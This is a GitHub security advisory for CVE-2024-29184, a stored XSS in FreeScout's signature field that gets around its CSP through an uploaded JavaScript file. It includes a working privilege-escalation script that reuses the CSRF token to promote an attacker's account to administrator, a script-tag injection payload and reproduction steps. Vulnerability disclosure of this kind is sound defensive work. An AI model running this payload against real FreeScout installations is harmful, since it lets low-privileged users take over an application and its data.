Skip to content

Stored XSS to Privilege Escalation After CSP Bypass

High
freescout-helpdesk published GHSA-fffc-phh8-5h4v Mar 22, 2024

Package

No package listed

Affected versions

<1.8.128

Patched versions

1.8.128

Description

Description:

A Stored Cross-Site Scripting (XSS) vulnerability has been identified within the Signature Input Field of the FreeScout Application. Stored XSS occurs when user input is not properly sanitized and is stored on the server, allowing an attacker to inject malicious scripts that will be executed when other users access the affected page. In this case, the Support Agent User can inject malicious scripts into their signature, which will then be executed when viewed by the Administrator.

The application protects users against XSS attacks by enforcing a CSP policy, the CSP Policy is: "script-src 'self' 'nonce-abcd' ". The CSP policy only allows the inclusion of JS files that are present on the application server and doesn't allow any inline script or script other than nonce-abcd.

The CSP policy was bypassed by uploading a JS file to the server by a POST request to /conversation/upload endpoint. After this, a working XSS payload was crafted by including the uploaded JS file link as the src of the script. The crafted payload is like the following:
<script src="http://127.0.0.1/storage/attachment/8/1/1/StoredXSS_PrivEsc.js?id=7&token=c4786c4497db3c6254a0c310623a43c3"></script>

This bypassed the CSP policy and XSS attacks became possible.

By exploiting this vulnerability, an attacker can force the Administrator to perform actions without the administrator even noticing anything suspicious. In one scenario, I made an exploit that forced the administrator to add an attacker-controlled Administrator into the FreeScout Application, resulting in a compromise of the Freescout Application. In another exploit, I was able to force an administrator to change the role of an attacker-controlled low-privileged (Support Agent) User to the administrator role.

Impact:

The impact of this vulnerability is severe as it allows an attacker to compromise the FreeScout Application. By exploiting this vulnerability, the attacker can perform various malicious actions such as forcing the Administrator to execute actions without their knowledge or consent. For instance, the attacker can force the Administrator to add a new administrator controlled by the attacker, thereby giving the attacker full control over the application. Alternatively, the attacker can elevate the privileges of a low-privileged user to Administrator, further compromising the security of the application.

Attackers can steal sensitive information such as login credentials, session tokens, personal identifiable information (PII), and financial data.

The vulnerability can also lead to defacement of the Application.

Mitigation:

Implement thorough input validation and sanitization mechanisms on all user inputs, including the Signature Input Field. This will help prevent malicious scripts from being stored and executed. On processing the inputs in the signature input on the server side, verify that only whitelisted tags are allowed. All other tags like the script, iframe, form, etc must not be allowed.

Steps to Reproduce:

The video is also Attached.

  1. Enable Editing Signature Permission for Users.

Preparing Malicious JS file for Privilege Escalation:

  1. Replace 2 with the userID of the attacker-controlled user. Also, replace yldrmhacker2@gmail.com email with the attacker-controlled user's email.
var metaTag = document.querySelector('meta[name="csrf-token"]');
var csrfToken = metaTag.getAttribute('content');

const url = location.origin+'/users/profile/2';

const body = '_token='+csrfToken+'&role=2&first_name=a&last_name=a&email=yldrmhacker2@gmail.com&emails=&job_title=&phone=&locale=en&timezone=Pacific%2fSamoa&time_format=2&photo_url=';

const options = {
                method: 'POST',
                body: body,
		headers: {
                    'Content-Type': 'application/x-www-form-urlencoded'
                },
            };

fetch(url, options);

alert('Ha Ha! Your FreeScout Application Has been completely Compromised');

Attacker Steps:
3. Login as a support agent (user).
4. Go to a conversation.
5. In adding a note, upload the malicious JS file.
6. Note the URL of the uploaded JS file.
7. Go to editing Signature.
8. Input abcd.
9. Turn on intercept in Burp Suite.
10. In the request, at the end of the parameter's value add the following XSS payload:
<script src="{JS_File_Link}"></script>
11. Turn off the intercept.

Victim Steps:
12. Login as an administrator.
13. Go to any conversation, XSS payload will be executed and a popup will appear showing that the Application has been compromised.

Attacker Step:
14. Back at Attacker's account, Refresh the webpage.
15. The User's privileges will have been elevated to Administrator.

Evidence:

image

The attacker-controlled User.

image

User uploads JS file.

image

User edits email signature and injects XSS payload.

image

Administrator goes to Any conversation. XSS Payload for Privilege Escalation is executed. An alert message is also shown.

image

Attacker user's privileges are elevated to Administrator.

Video Link: https://drive.google.com/file/d/1Jz8PcQgpF2gZfbmMGsACfGl4fY3U8c9C/view?usp=sharing

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
Required
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

CVE ID

CVE-2024-29184

Weaknesses

Credits